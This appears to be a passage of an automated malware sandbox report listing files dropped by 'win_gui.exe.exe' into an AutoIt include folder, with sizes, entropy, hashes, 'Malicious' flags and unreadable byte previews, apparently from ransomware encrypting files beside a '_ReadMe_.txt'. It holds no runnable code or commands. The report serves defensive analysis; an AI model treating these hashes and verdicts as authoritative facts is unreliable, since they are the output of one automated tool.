                                Preview:.,....l............sy-.oRs3.X?...N..U.M....?^..>..i....c"....:;0._\.M.-..2.c.@...v)U.Sa.[+.......j.....&.V!.E...Uw$.....h.<+.h.n..u}.p.H.A.L....V....1.jA.k.B.p*..%C.]..7. ....~)..9.pL..C.5...V.......%..s.x....=....A..c....wEyA.....B.....3...D.<%.D4.u.a.n.u\...m.7d7z... rr.l..Y...M....:.p.9...7....Y.I[2.l.J.'w.H*..Z.'.ll#..1.*.6.I~-T....KY.D.$[f.(.I...j..G...C..v.T.0.!.O[+FG.9p..k..H;.N/d.....s.Qm..hA.:T.r.C......'.._x..r.r=...wK.K@..QfR.;,..qf.........(L:.gH.V......._...o..Ouj.M...3&gF......H..|.Y:..#!I}..m....SM.2.......[../..C..W...O^...E....k.r..T.....I-L.a... .|........o)..a..W[..g......;....(..o..v{)~W'x./a..4vQ...........-..K..!...^vN.../8!...p..C.o7.d...'N....o..........2..u].L.Au3.a.C../LT.*.AYm....}yy==!.A...]!x.(..3.X.u...nvG.. ...N.....{1....R.-XE.......b`e...j...........D.).62.<B0...H..u..t..(......N..CUf.^2....5H.YXn{..O.r0....1...f4..w..s......y^.r..z.v..fe.Z.1 .S><...r.....Od......q.............)@.........{:.m.d.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIShPath.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45110
                                Entropy (8bit):7.99567981422741
                                Encrypted:true
                                SSDEEP:768:4g4PTMQ9KM3DkxVjidsoRarLFOAlIeEWw1f1mCLmoYgwx1Osykl90+q:4Z/97DqUdsoRGLoASeUx1xmZg61Osyke
                                MD5:FD29DCBE15C9E332B676FFCCDD174B7B
                                SHA1:33652E8C84860F98B1E3B5C853E6ED38DDB056FC
                                SHA-256:9D8AC44E2DD6BD1E979D2E2B2AF418B982F2E7F537259FBE7909302DE43A6FCC
                                SHA-512:ADF690D0D4A7E952C4131891ABEF87E770ECC7B8903A9E50DA4C821464BF9FC153192847789182065C74AD6042B9F0E4CAB74F8D54CDAB03DDA5E5CE2FE71442
                                Malicious:true
                                Preview:.ts....F..:.!...V...."SXX."...9|......./....s_S..J...`.....+....w.3}..M..74...C2.K..U..^.._J.u....2.l..x..K...N..j.|t..G..=^o.R7H.S...F.%.....I...!.....7bid......oW..h...l...%`..0.y.C6z..i.{..."..{...O.W..5~..;...0......A......"..%h.'...x..J...']T...e.w...s..3..;.... ....)?...p...]!......9....../.q.....m...Bi.3Yc......S..b..O.d..o...z.2..A..z$...`.....2t..qO.d...f....}".cNQr.Hs....$Z.'D......:z....m.!....z@$._..!...g.........F.D.K...G.,(.@ .gpXc..}.x%`.....o...[$%.q........s........P.9.....f.X.W.<.l..9/D.....`:...b.w.a.[|.^..C.\..{F..].k...">69w.!3E..}...9......~...,|..el....(#/...b`[..!.R.,.a\..FM.^...+_...b)......4..zl.#kR|(,.u.q....8.;..cL..A.6,S.e.<.H......zA/."....:..452..[?.w.G.AT...<.Zu....;I...X...2...A..,....q[6.3..L..w.O|7.0t.c. .i.....j...?....{..t........<.V..[}.....MR-...I.<G.....<......6[..V+...C.."..;+..+K.."..~v..pm.5...1..`..,.3....*.+...SM..<.......b.j.U.l..U.r...Dx{.7......-..WK.{..RF..SM..,u.12.z.._...C..X....q..

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIShellEx.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):43041
                                Entropy (8bit):7.996224052476002
                                Encrypted:true
                                SSDEEP:768:+EharlTbhn0CpXecGIU3hEYKKjQujfYhg6vm03Fy3GAzBFXHbdKH6MynJg2mC:bWBn0IhOhE1kQujfYbvVFQ1FXxsmg2h
                                MD5:7D1665A1790A327D64F06619B7587CAE
                                SHA1:D5E2D7E20B3F2CB3A10C6E1493F43515DCB686CD
                                SHA-256:2EE479729E4780F1C4E78D5E737F3AF391A39A44F853CEDFF516156AC2AE906F
                                SHA-512:ECD9963E19E44C17DF83C4A3551A4B9D6CEBE983E8558C550B9FF12D6208A3E1AED2A8806C748939D4E61AA8E245613C48197CD14DAB2BAF1EA8B5CF569BF9D9
                                Malicious:true
                                Preview:....)6....|.6..nk:)v)...|....N...A.3.;..y........#:....7.v...Mw.*..P..7...sZh.ZM<...._.....ol.I........K......YA2}....q..R+@hu.{HA..n0*[..!R....W+ x...........I...=Vl....;p1.=.../c...~I..5)S.M...Nq.%SRN.?.|...S.U..W.w..=c:.9..<..vT....X.:..9.[9....<fzV..u..&..7.%UXx..!9V.P..|4.+.i....^...)L....mUL..%.AT.I.....b.W....).F...7mp..A...3.I.._......G..y.m......X......q..=...pV.U..{.O.....#c.\ki..Dv....s...../..!....w..c.....6.t.U.@.+...=z...$.1..h3..&..\....b.J...J......<.zq............O..C..s..g.ErUfK...........>A.H.e....a.......k......F..Il.....5.-'.&J..?.+3.L..:KN.y.L4bD1b..0..>..D...O.9.S.Btu.^#>...S>."...^ek...h..no....p..d.H}%..._R0_......=y..t.J1c.......`.L;..),.3#.|..?2.4`.%......G.K.eR..Ow....5dv...Cr..r%.....5.. ..g..M.}.......pMx..o....."#........:f....!W..K}......^...bO<...F....@..LN.I.En.......y.D7Vb..J(>.......@..=..Ogh.%..w$...L(\E...z"...`.(U..;`"..<s0..3.\.=.=..4.....y..cQ.gd...%ZrE?..J.....;.}..).X.....U.a.i..)...}Fi ~.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):78202
                                Entropy (8bit):7.997756107228158
                                Encrypted:true
                                SSDEEP:1536:FMh8tqY2qLOzI4hAd5u5rd0PPKK4/1pC2ZDo1U9SqTDlR:iTY2y2IqKe00tpvDrDlR
                                MD5:24233943B7B8B1FD94D72A6152057C73
                                SHA1:586C1D0A1F74D22A202E28D8798D936198D4C2D2
                                SHA-256:10AC3A1641BC41D16184766C45F7A989021614757FA546349E96D9B0EB79E847
                                SHA-512:CB83CBF78340EF759C94B09491D2CF3C08106C738922C4B05D4D340B58DBD3EE4E96B534177225516C7D0D9D1A5AEB6A6F4C1AC1C56388F2148DC826184648E8
                                Malicious:true
                                Preview:..Qk:q.$..D.....r..*[..7..5.~......Uq.......[j...:+7....x..f..F.s ......1.9(.-.l[Hm..H.G..jj5..`..,A..'.........+a..-.....)._...-..CCp.........YFO....E...S..........`n.........2...8....2..3=.t.....spg..7vF...&.s...Ik.:..{. ._.S...R..L....-m.j..w....+z...~*..K.y.m'..!;._|h.Cl..L3.4.F..N.+..........K.z-.q..L.....DF..<._.!...A.....i.^G..H.>*m..n,......H.g%....N.....0.F.oa)).i1.e.....V..Y.Z>..(\ha>I......r.8.....8.s1X)*w.b.ro.J.. .l..p...............X.N.j.9X..`.#..X.)o....(F...q.k>5. .^.......~1....Bw.....;....%.a..9.F1w.y....a......1.C....:?.J..R...q2....+o.+.V...N~9.D,.O.....R.|..Dh3{4.T2..|.hK1|.k..?...\-}9.A~7....q........`...#.....$...".Zv....6~............QcO.f..{=]<^q.l.#1...:"...Ke.......N..:5nh..(t!M...[\....f..Z.y......./..:rb.R...j.a.....ozJFW..}O|.0Bx.h...S...B.3.|....ZH.DN..-...fEs!....`.c..9(....).yu....R......8.Q..!....[w..3...m..#...k?...i......^gp.DM.X...l.~G....'>.....]./.I.dH..7n.P;.,F*.%dl......\.&.;0RU..7N5...(+

                                C:\Program Files (x86)\AutoIt3\Include\WinAPISysInternals.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28699
                                Entropy (8bit):7.993136863460101
                                Encrypted:true
                                SSDEEP:768:e4GxgW0PRBlfN7X5ycjdVKpYCuSmb8+vufXrtJ:et05d7F2pYCu6/f
                                MD5:F932A11B4954C664991767791003591B
                                SHA1:CB0258F139F1BC7489D0202BC8841D4E5BD7A230
                                SHA-256:51E2CB97B17955DF7F613821BABED7858E3A46C7CF64DF36D9C7E657A72D7F25
                                SHA-512:E47EF7BF7DCAEEACC27E76C2603C2F6AEABF9D18F54225C0480344BFA259C93393980547F9B83921C946E6D6A6A057DFE3C071AF6A4AFC630C032C3F7D7E9059
                                Malicious:true
                                Preview:-.r.-..-%47....]#.....h)ij......p6.b@<........t....r..&..5.....Y4aN9...v.%.bV....P..z......@ ..s~8^..........r?w..=....F.k..X..*.K!....d.4.....<.H.l.s.j.:......?........3....t`......G...`....1.fE..M@..(...M!...U.........,...g.>4.6Y`..!]..m.N^.&....;..WT..9VHl%.?..5@.d......'...~.[ .F.....P6.....EX..e.......D..!8>.......8l.j.i.~.a....@.|...[........)1....D....T.~..2.m....+..9...g..t.\.NH.W.&.y...g...C.t.0..@......Z.m.]<....)...O.....b.F.M.<........X.n..I...f.OA....+...eO.>,5.........]..}y.40......$.%v.*.......-.9...w.s,.V.~.U..h....CC./.+.l.<....U.............b..D.ju@.T..;L.x+.i....b:.......m....... .6#..T..}S..<w..1...)y.q..O'^.O?...;.&7...T$.P...3+..eg.+.!...Y..T../.].?.......K8.n...#}...Q..".z.BG.o'A...._..........\.R..@......F..F1[....:...#.P......Qg...jD3..UVB\......7...9].)........o..pqj.........5...u...w....)...&Z.%#....v./..........}U...[..e...."8.`......v.)...).N\m<..r`.9.........+[n^:d=..?rCT9.............c..]..6.o.\.....

                                C:\Program Files (x86)\AutoIt3\Include\WinAPISysWin.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59065
                                Entropy (8bit):7.997113050116395
                                Encrypted:true
                                SSDEEP:1536:PqLlcryUBAjN2zAsO9Iv4duCmyKlKHjrQGQqlCi:yGBAjoA5ev9kT1FYi
                                MD5:E750745D0B4B11DAA75565E42843A8E1
                                SHA1:C616D2DE9A3A4D1B655AFB3BFC0941B131E28B04
                                SHA-256:B2B185D64D526199527FD8AB802642A63639755B0EAAF0A4EC11AC4F167BBF9B
                                SHA-512:04A4B80F02B5214846E8D4E24F978C2248D8C958872102DA537C105A6611B392F4BABD8B2BB502EFF35ADD6FC195C1831C282738AF43BC369BE1BF1C099377F2
                                Malicious:true
                                Preview:I.u..[\.eVi0m...23..)B.....G...e...$...~...5..~.C..S6.4.M..L.UF..S..N@C...1.....}Z....Q....eQ....dk..[|.c&.."P}..'.2.%u...q.T...(z.D.....qr.t._.....yuY.|.y.cD.-q..<...T...HD@nM.h4.]....{&@&.5]...............90}.U.:<VUaI..G.v4^A.N....K..L.u.[.F..}.{..(..p}=.w..2.......C.........%...(0.;....m..i}.%..Ym...y.6.Em...F.M....C....b_.V....7_POb...?..............?..."2..1^a...~.....w.`.~".e...p4Xr%.q...9..........6.~n.....j.>.......O2h..i.....)E.p.....M...{.y.".....:.`..lT5ow..c~l.dl.].....>_Fb.K....b.....F1...)..:)b..U.`{.a...R..<.7.bZ....u/.!....Z#..-..c.......`......#n......`.X..yo.....%...M...~.ea....F.S.|..X.D...:...x(}.xv..:.r.d..E.C.B.:.0..}G..Hq....j....0..k...#!ET..b.q..Uo9...i6._.x......t.-.F.F.Y..u.YP....z.bH....,......p2|.2.....cNH....<..0.C...(/....h.....3......Q......&D".".k.....X[.\Wp...n.........5........N.D.........h..~..?6"!1.....}...f76l...._./M^J...?.8.I.X.....).....~:..3.....W../..(a.|..8P5.f........M%.i#iH.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPITheme.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):42453
                                Entropy (8bit):7.995573747932359
                                Encrypted:true
                                SSDEEP:768:HAqdbccge+9bPxbsBtukUD2Wqbwp+8BndMJaGzhl+0xXZUL1YoJjCNLtNso6+:gSAFzbPxsrnUD2hbwnnG1LwYoJyDJ
                                MD5:EB2A78AAF01CA6C1A58CA8B0916B926E
                                SHA1:CE8E82E50839F354715631913199E19A49BA4B2B
                                SHA-256:53B56BBB778F79797E8582D924944F8C50702837BA25CC92ACC7FCFCFCA6EA97
                                SHA-512:4858520683108887D0412FEFCA6E4429B918956C15D61A85A68EF50725CB09C5B6DA2078BF30F3B2515D2DAD24D5468CAD1337B3A99E48B411E9D9AC37F45F9F
                                Malicious:true
                                Preview:....V...;..&H..q.v.35..*L..J..J.y.W..Ni...;...2Y.?]./..I .d.U7%.R..QR xV~...!_%..7.........S=.bg?...3..T...D8...9.w}r..>n.}.LqV.aG......YtR...V..8.yL.....?rq..~.jZ.$@..:..&.....b.q...6r..t."\..9.9...T.<+z#.#..jF..M...(...}f..d...r^`6.x.v<E.d..2...V.+..$...../.E|FkFY..;.....".?..p......k}.t...k....'.5Px..e.gH..H..Vz....#'\L.....Zm,....|Y.\..^[...V.q..;.\i.e....>..N.@.5l.sR.S.pw}./.......P.?sl.. .:..._..^X&kQ_&........H....Q.9g......Fg...UjH.J....q.)8x.^..0.9........p.Q..h.j..?.+................a.hC3.>....5.Qw..x#W/W.2...~....._#..W..d...pRlI'.~M..M.=...6........kU.~..K.I`%...........V..n.......N..*...]...-.v<...c.0...o.#.>.6..".D^]b.Ib.'....EW..)..<.A.1.Di.t.0.%l.;....-1.!c.v... X7..(..=.7...a.L~.Ul...._6u.......=.=x...~z...$t...r_.C....k.....d.l..\r..+...dD.&...%.;<.GU'....e.$.....f.H.Z..9..S..@...;.nT.Sg.BU.-.17.C.gH....B......a.....6.P...9Q`f..|.x.....1.`\}F..h...3r./|^.0..%...'.ZhTZ.EJxqnn....CK$`#....2..v.>..?........bt...nH./M.{T._.C~/

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIlangConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8925
                                Entropy (8bit):7.978752689949959
                                Encrypted:false
                                SSDEEP:192:1/KyNwA/nAPkIMPSDFpKvOqgJY2oW50xrStPolCPP+VO7:DNikKFwvpg10xrc1P+VO7
                                MD5:EB7614060CE1E4E9100B357FD9C90347
                                SHA1:01CF4F11C57724808AE112CD3729EB50A7F34A1E
                                SHA-256:9116679FADEA7CB892D1210C6CFAA97971C928C74539C7DA0143A04B734B7B54
                                SHA-512:97B395B4E158D77DA4169F0FC70B55F18E7CEB253D9C1D420062B43DC87AE7ADED970A4E04486ADB80659FBD7096B563996C9FA0D74AA0054E7946D200F68949
                                Malicious:false
                                Preview:..(..".E.QP........71.t..r.............n....g-..0B..~.Y..Kxf*..L.i.DL..N.S......Uq...'...ZI..Y...S...A.;.DM.*.%TK..........g...,.xA.o.g.m....3.p..C....N....$.K<.-;fi~H..h.8E!..kH...N.4#d.k.....V...G..S.x..qw....m....h..%FR~(...$6...............>.....%p.i7....?.:).8..F,......j..n.O...h......m.."b.$&'S...$..k..v.ZL$W..g.W.."1,....R..G.&.\0M$}..g...R.N.<....Jc.Q..C ..Y..6....R....[.$z..._.............E(.i.t...H..Ak.'..Rk...D...e:.6.E:...~....C..;.;.....@.1.......NS.W..=....gw.C.CY]>f..6.....cr..+......Dq.E....$9 d..7"..:.q..;.s.P...Na...NMQy2..V.>.....6h.....^.Ew-.!..d..J...5G....S"o..K.YPT.fP...B.Pv.7z.D..t.=.....4i!nK..l..^...].-..\l..$0.?j6....Bl..X...97.O..4.|....W\....Lu<J......;.......n)]|.. w.^SRD..s.a.`':... ..Zs9q...A.)..,.2*.{|.^.\L..v....R.......X....P7k~.?.^pt.Ih.IFf.......;..h.j..KPj...t..XX..H.N..k.W.....P..T...u.d0*j(k.I.......*...rZ&/C..Z.KS..8.@..q.....x...).?O...O.z.y..8..R.7C8m.j.&.mjD.....8%.....b.~IK...g../..Z...

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIsysinfoConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9626
                                Entropy (8bit):7.9858070233296665
                                Encrypted:false
                                SSDEEP:192:op4QZRQ3O6GiXHHVMmdyM/c+Tg052gu3kvp0JWc66yoySgNT8lZ8m1+VOG:oWQfQ3O6GCVMQ5BD2gu3+0JO3HDYlZ8h
                                MD5:196C668F69ECA312250AC487819849D3
                                SHA1:30548B6F7948BE8F02A1A8DD5B1F3698642F839E
                                SHA-256:5B12AFE011E8E02D42DBF27B02D5042C35C05D175FCB7EF5EB6537A367ADB04E
                                SHA-512:0576B46B84102FBC778C008CF7778BA6B8B58FBE8D856B1CD43F6D79C621753B5EDEF8A4653E0B8731B4B29736BFD5CBD93E9A6C436F10013296FBC24B692B83
                                Malicious:false
                                Preview:..m..:..dksU..#~. .....'.1q..INl.$...2%.....2...aD#.:......9....P.~Zz3;....Tx&...w..X.fM. qhp,..)8......E5ee..".n.......@..w.t3........:.@E.....\...X....+0..Gg..py.om$......s...V>]W.L+N..C....V].U...JAU.g]\3'..m.Q.8.D...&...#.1.{.@{...........\+q.:O!..C.~...0.x |\.#...>.o....M.._..EO8.2.2.r..r..|D.(}=.CIt...T.....=z..;..=..sb.L.....9d....9.].;...r.S*.."D.`..by.....H(....c-......G[....w..].>.Pb.s.o..a.=..|Y....r!|.\.I:...[..i..K..5H...}.c......Jo..|SR..y..4.....,.!.J.?.Q.d.f.q.....o*..r+.ha..Hq..^W.G.\2.@C.+a(....q.4.^~..-.]o..N|oF..(.E..1.....;1.H..1..CP.k......4..bB..V.........mo..H.4..y/.o...-.mc...f.R-....GRh...~..+....K_.j..)7.....n-..\.....u#\/.$RJ.....LU)=,..W....M.,O.R..o..k9!..+...a..C?...Y....X.lz....'.f5E.......].....|C.LYP-).>............W....C........E.0........7....]..h..|..8:.$lx.._s#.uTS...~...A..5...^h..G4P./.L]..9..~.O(3...S.P........px...y:fRp.......u.l {H..a..:.-.;.>hi..o.1H.\.M%...@) 8...cRc_.gD.}......1ej

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIvkeysConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6867
                                Entropy (8bit):7.970007115002978
                                Encrypted:false
                                SSDEEP:96:DTq4EKb2SGL39Pik6p1AMB9kmWLdN+WvPj1ktYeCmCrt7B0IwM7E1k6WEqydevul:D1d29TBuAK9kRRtPGtYb/rZo7Wg+VORl
                                MD5:CCA8CAB2153A910A214B833891E16603
                                SHA1:0C5605265215AEEBA3ED785F7DE69B300DD1AFE9
                                SHA-256:272717E9239CE897D4D6225AB0BBCD7819325641A9EDE35F74BC1D78D5917595
                                SHA-512:6D422D95A93FE2E031500BA6E3F7331234E4EB401F0603F96647B30C72EDCE367B9A6BAEE09FBB22FC38778F38FB4DB6376D0E254682F1A7F98949DF9D8989D9
                                Malicious:false
                                Preview:..._....XT5..:......B.$..Q?..\.{~.@'..-@F.i.....l.r..a.gy... ./.Ka7........Z.-G..:?..r.=..:...j.P...7.3c.o@.7.zq.;..F.GG&<..}.['.......#.H .7...~...nyn...E...3.......k..j....-.B7...M.;.C.w./.|.Cqx......[...d..;.....V..S.ek.y'.??ro...L....\...h.?._.Y...w...N9....v`.{...!..g._...e<9.n....._h......"...4.&....km..k;.x.......q..>a...o..C..F".....0.r.~..k^X.,..."V...4...h.T.........6...$.0..YC.........SM..m.U.Y...D8...&.......]AX(.......tD..Kc.um....A..U..(.aLG{.....g.^.61...n.J..1...^.......M..|..q..aDIx./.v-*.....m......:=N..[..y.a..'.....&2...;F5.n...sh...0iSP....*....&.\(-.$..t.K......q.r..c.].!.....D...o...u.BF.vf}.<9...N{....Z^{3)..8.....R..../>....L>.0.T.|^.%...O.Vq=...d.......8...2.v.......y.r.mu]V.BG?.....H..u.[..'&..jnX5.5.......I..d.{.t..E&.)..6.m..u@$.A.F..2).4..XM6.J.......z..w\|..X.&........2...+\.2B..[j.WB%..f........Z.........l...z.`..s........0~>[....4.23.H.....;2.xI@cc...O..,.Ds...]......Ux.6..T.A ..!..W...0R...i3....>f..

                                C:\Program Files (x86)\AutoIt3\Include\WinNet.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47388
                                Entropy (8bit):7.995759484423379
                                Encrypted:true
                                SSDEEP:768:RfmHq9KPPjKgkSaI1goEj5SeUaSMI3gIItJXiKUyDPz3AeKYWFnlgfiTAInAi:RfmHqEXOH68c/aSvI3UyP3AebmnKfiTP
                                MD5:F4A1F04E141A236DD5517134129D2728
                                SHA1:262552ED8696CB4D0E5DF2A34D5025D951F57485
                                SHA-256:F3575A69AF187C32139BECC5F512011EB30C983ED99EF671D1363F1436E8F112
                                SHA-512:BA239083898EFC8609FAEE6C0E532F23FB5E1733017F82F43BA9F4E59765463528128A90454258F3EC433810827EE1FC999B4977C598CDF2150A7EEDDDFC68B9
                                Malicious:true
                                Preview:twE....a..-|...?..=..F.w....l&.8....=r..m:.F7.{..T...,...R.k..@.....b.!..i..a..<.W).bB8.2..6.9..]_.W;..a.....=..O.].g..TZ..&}|,\.JZ..y.;).....c.u.#..o.....l.6u$|.....<.(....|.....!..Yk...%+..B....".....p..f...B...e..W,..'.PO$d..].V....^........9o...n....y..Y...........<Q_8...}..'i.2.p..gm.^.J.T.........\......^.. n.J.}.A.T_...S..B...#....t.;.sG....I.....&......&..Ei......5...Zd..=2R.|..3........,.l.h.%...u.)U.U..../.^..E...'..7....:iq.....kh6Uf.n-.........KHRX.&..4X/.......k!.......t%m......f...O5..d[%.6..w.A....r...dP.].........X...2H....+.%y...F1.2..6p.~.hg.;3L.".....&..".RI.....>|..:.`D..&...Iz. ..]....>..>d.g.27.......{|3^.vC...J..... .,.:..?W.{Vmn.du.M....f.....G.6..._...SO....=....c...z.....q.<.e.......9A1$..p}....X.L...... ..N.G...l\....n .|....4.,....@....#bli..|.w..B!@..n<|...j.xpe.B.?.P..YO..N..L...1...U|..D.U..v.c*/.H...7,..:G"..s..z.YU.mH ..W.<.`.;....'C..R..\.v....F.v....=Bx..P...?4.I...Z....v.b. .L}.._..w1.S.0.

                                C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34074
                                Entropy (8bit):7.994342177268926
                                Encrypted:true
                                SSDEEP:768:dF1MIgc0Fh1Gf1GlZLgCSO/JTVYySl/fd051wt4AHxDE:dbpR0Fh0olRlbJhYyS9K5ytVHa
                                MD5:A78E25DA6D44222A9B40499B3CA0A4A1
                                SHA1:F87DAD593ECC249FE35DF7D2F986D2626346B6FB
                                SHA-256:95715C03847D0E01335F1A40E5014368F08B49C013DF235CE2C694291A9D1C58
                                SHA-512:239632071AB2E366F4CC5E7B4E98058D530A648E0397AA9BB4685A61BE4E0B676A5BC185F157516CC23953D03CDF9E0D5564CC7728AB11FDF6E4B088B0C13671
                                Malicious:true
                                Preview:.c.:].g'....8&..0W.-.q.DM.o4...s..qb0#...23q.=m.c...DesHU...O.zZ..f.v./ .w..Z...]...B,Q....i.......&8.)...h%7lDpE..d.+....l..,...U.X...n.dV..g!..Na...5.r..K2).r.A$.....'.x>...w.ga.....#..{.&i.{4.N.....&V...V....Vx.o.......>S..f..6j....&$:...3..r.Y.(.Q`.}.........l7.E.u.........G...HTd......|.....c...?.R..|..Iw..../....r.$o.Z.p....R.?a).F1..t.._u(..Q`I......M../`.{.,.#.G.....b.B....4.rT..?.m....^e1....o.....#../......\bu.y.. .xM......M...<........O.VL_u..,....a...T~c..x-....x..u.B.t.y.f}.....H1..I.c-.../k..9..X.8.|..&y....... @...[...Mc.6...;gV....Ct...E.1....Y.].nm......*.y:.9.'G.>......Af$sU..b..#.6....*.2..}..x..`....y..D.*........KL......K.5..*.'......Xqt....L~.....<'...bk...!.....=.....I7.....M\jy.E>.`.B=.Z.k..)..~....=9.D..*.WE..T.....G9y45.*.-..t .e$i..W4wd.b..T....H..#.f.....0_..6........\...).0;.t....qu..].wa2..-..M..\.?D...)..W./YU....-.W...4M.o..o...CL........Al@;......&..]...+q..S.}....!.H..~...w.D...K r(~...x.s.R.Q..},...\1...~

                                C:\Program Files (x86)\AutoIt3\Include\WordConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12276
                                Entropy (8bit):7.986194181461965
                                Encrypted:false
                                SSDEEP:192:Nnd+dMnS2azSZudYvoeBnsogju7jqRlar81gnAORwaxqzA32IgPAVrgSe/PVj+VN:Nnd+dKYSZud/aYjmjqj31gnACwSqFIgu
                                MD5:4938D51A79C1731F0362506F51A47158
                                SHA1:D975477E9824E957BB6076DCF52A771B4F783D5D
                                SHA-256:72797D6B41E53F380F56A98D38CD97E87E883DBA7869EB5C91FFAE204CB4F395
                                SHA-512:A78847F9F0DDE265356F448C9EB4D8516466EB4EBA519E5833292DE582F91B6C371E1C425FE663579E52E713F4B7BD264FE871D2DAE3C93B1C543160F5DED860
                                Malicious:false
                                Preview:U..C......h.....n..1...p..2.#...=.w....,.%..Fi....fms.2.T......f.M".+.7r.....b#j.l.4.5.s..?.Nd25...U.....Db..4.........D)..;1.>..w..?..t...S.U\m..&b.6......L|f.l.q.v.Y.W.`..r.;.#....@.."..d...,.-r..i_L..OB..7o8.;X..(.z.1.0..M..6...@.?._%...d.Y.o'D...k......R.*k."xD..H$..U.q...;....c.59+..Q./.k.4.....-.`....@.AqWP.v......I.....Q...4...I....=?T.-.1pbpG...KE.0...1...N..W..8g..5......c..4...b>..p....;...`.3.H...n....W.(g~D..x...V....5.C....V3..U............f:.-.9....@~..j.'O......e(f.U...i..e.b.#y...*.p.g....wBB.0l#.Q.._W.f,UU.....v....-7a.t.,7o....md.<.$M.> ....V..).c%..u2....V..c.i`o..h.t.|?.n../!...R.....z.....GMU%..e.GW..H.K..E.b.Q...vA...z.5.L............'....6A.!5j....4.0+..4.km).....]....2x+$....A..a:e.....8..=.j....i.h.+V..D....\.....1..Rw...!.t.4...C...G1'I.i .bH.W... ..Q...l. ..r.&...V9~sP;.1l..r.s.qB.z.u.H]...1...^.p9..f9=.P..P.aC..$c.o....l$.?;.:..o...sP..2...v..Z..R......Nl*...\..3b..jL...]...m..,.=,....o.....5ZN1~.......+:

                                C:\Program Files (x86)\AutoIt3\Include\_ReadMe_.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):822
                                Entropy (8bit):7.7309416836348674
                                Encrypted:false
                                SSDEEP:24:diuDCxMbNz5z/wpDyYPGTNj0hOHAVMJg6WXs9dE:dxDaezN/WyYu+MAVMJg6TU
                                MD5:AB75D8C037578B71855A1986B041C955
                                SHA1:6F69A1E249BBEC66A8095DCC1DD717F48CB4B9A7
                                SHA-256:B299327BF45E050C7F6181C07594E8DA0A3AEF871E5639CA0887E7E820C5710F
                                SHA-512:24C62F553705CAE03B8997B06AF92ACB3684C31E494AAB11BD5DFCC3FAE1CCB8F10E18D4DDF57F57EBA9AAC28D11EFD0123A9992E7C0A34D34B7867C4CF0A4A8
                                Malicious:false
                                Preview:d2k ......D.....gG8.z.....z.....I..v.....%..hr.;..o76.d....HR.G..b..k.....(..i.....~...*w...).tw....t..W..()....DQ..T.Y.{G...k..E.f.C!........>.....6i....9.*137...\C..`.%..>:.?..#..n..B.+|.C..F>+..t.>....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N.G.)O..]..d(.....H.'....3.g.nm(.X.....................fk.W...f

                                C:\Program Files (x86)\AutoIt3\Include\word.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33529
                                Entropy (8bit):7.995234203898862
                                Encrypted:true
                                SSDEEP:768:9fmVrJYLP8NTGzR3oiwZqi5P9op6fKzXXeDKjnI/yjAnGkjuzrdU:9KJ80dGzZ3Cg6WHrViqK
                                MD5:FC56C9037FCEE5E6FDA29AC1EAF1BE57
                                SHA1:71C9A8E693119C02C14CEFF8A7A162D3FCF6F102
                                SHA-256:DA9F11F3AAF37C541BA4F5A4E3A8C27219759BB7BB985A016DC34FF406045AE1
                                SHA-512:B96FDE5931A52866F5DB3519A8F0E98D6D817A16D600F3D1290D0B8B6224D7D18D1325C76A0B64E5E82427CEFCCEB3A0A1320108FAB25DF628EF5E8C504CE33E
                                Malicious:true
